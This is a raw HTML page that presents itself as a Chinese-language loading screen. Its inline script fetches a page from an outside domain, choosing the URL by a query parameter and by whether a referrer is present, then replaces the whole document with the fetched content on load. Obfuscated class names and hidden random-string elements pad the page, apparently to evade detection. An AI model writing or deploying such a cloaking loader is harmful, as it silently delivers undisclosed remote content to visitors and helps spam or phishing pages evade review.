<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .rA3w5R {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .rA3w5R .L3NKIW2VlTS {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .rA3w5R .content {
            line-height: 50px;
            text-align: center
        }

        .rA3w5R .img {
            width: 100%
        }

        .rA3w5R .QAnm3VQw {
            text-align: center
        }

        .rA3w5R .QAnm3VQw span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .rA3w5R .QAnm3VQw span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .rA3w5R .QAnm3VQw span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .rA3w5R .QAnm3VQw span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .rA3w5R .QAnm3VQw span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .rA3w5R .QAnm3VQw span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .rA3w5R .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function XYesJi31bF7o6(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var DWYU7E = XYesJi31bF7o6('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ DWYU7E +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ DWYU7E +".html?a=share";
		}
		
        ALrxkzeNp=url+"#"+new Date().getTime();
        ALrxkzeNp && function() {
            $.get(ALrxkzeNp, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>IscO7qFMDgA8XunoUcCZIRhshnakG33jAjBqsw</span>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<ul style='display:none' >z1lzXsVWlfeRLmruvmYf9CGkwPYQDXoVJSpnBMwbktByjXSVhor8NfGbV2</ul>
<span style='display:none'>IscO7qFMDgA8XunoUcCZIRhshnakG33jAjBqsw</span><div class="rA3w5R">
    <div class="L3NKIW2VlTS">
        <div class="QAnm3VQw">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<p  style='display:none'>QasSIRTcpMvOOuZ7nsmBpYvhjBDuRH8l3ujazj3JeG288yKsXpn5F8lX0FTnz0u69MPRD44SK4mdPQJhsfj0xh1</p>
<a  href='#' style='display:none'>Lj5oZwv6SNIqwi3929HZQJzzmOjsHWeGhPxb0Dg5Mhn9xgdw6CLIxwi0OvSMssl7MvOhqgV58fLZ3Ozo8SzX0F</a></body>
</html>